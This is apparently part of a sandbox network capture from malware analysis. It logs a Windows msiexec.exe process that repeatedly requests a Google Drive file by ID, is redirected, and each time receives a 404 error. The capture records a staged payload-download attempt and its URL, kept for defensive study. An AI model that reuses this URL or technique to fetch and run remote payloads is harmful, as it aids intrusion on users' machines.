                                                                                          14          192.168.2.6  49997        142.250.185.110  443               5692  C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp                Bytes transferred  Direction  Data
                                                                                          2025-01-10 14:17:15 UTC  418                OUT        GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:15 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:15 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-fHJIph4qD8CvDEIng9_rDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                          15          192.168.2.6  49998        216.58.206.65    443               5692  C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp                Bytes transferred  Direction  Data
                                                                                          2025-01-10 14:17:16 UTC  460                OUT        GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:16 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSSiKX0-gsKqyBGPLqDsZAR4jzajSLuGOrXyXlTb4e5yjHkUJudtsllSwXG7RhyzhdK
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:16 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-4OVcAue2NTF1QYbkvDiw5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:16 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qwtdydJRbPVmLZts9AkAbA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                          16          192.168.2.6  49999        142.250.185.110  443               5692  C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp                Bytes transferred  Direction  Data
                                                                                          2025-01-10 14:17:17 UTC  418                OUT        GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:18 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:18 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Re72qT7YV72T5BH7qPd32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                          17          192.168.2.6  50000        216.58.206.65    443               5692  C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp                Bytes transferred  Direction  Data
                                                                                          2025-01-10 14:17:18 UTC  460                OUT        GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:19 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ9lHkpFS77N4rEgXa6aA49OwJJ-ZQyfmoG2DyD3dq--5Y9SpNi0WUah9H2M1gYXvOIFJrwYXk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:19 GMT
                                                                                          Content-Security-Policy: script-src 'nonce-dNBakqSmJ1oFl3fW4VSayQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:19 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y-6nfbNomDzdCSOoZ6CFIg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                          18          192.168.2.6  50001        142.250.185.110  443               5692  C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp                Bytes transferred  Direction  Data
                                                                                          2025-01-10 14:17:20 UTC  418                OUT        GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:20 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:20 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-5493ajuU6tJj0hILLc9P4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          19 | 192.168.2.6 | 50002 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:21 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:21 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRo6JlScXTg9J78hQYE2NSmfkQLdRZa8gVPsiaoWzgt9xCQdrymEhs1tpqahVGLreKm
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:21 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-pR5fGjb_jCgfyoAsbclkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:21 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KqAswBGWe4YyNQ4xSFiPUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.6 | 50003 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:22 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:22 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Pa7wvJGpjZOG2UgPbJSdSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          21 | 192.168.2.6 | 50004 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:23 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSvGNbaSEG31mUVGYDP7Fkg-exoubnQsTpBJumXH91lr2Qlzyn-WvvOQdn9LyQhJzhr
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:23 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-0lwHe3Ad6m7RVn1Fb9VLzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N6_ELYQr3N0xVuQ_n6Rwdw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          22 | 192.168.2.6 | 50005 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:24 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:25 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:24 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HRLoYsPC81JXccEHYlJyVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
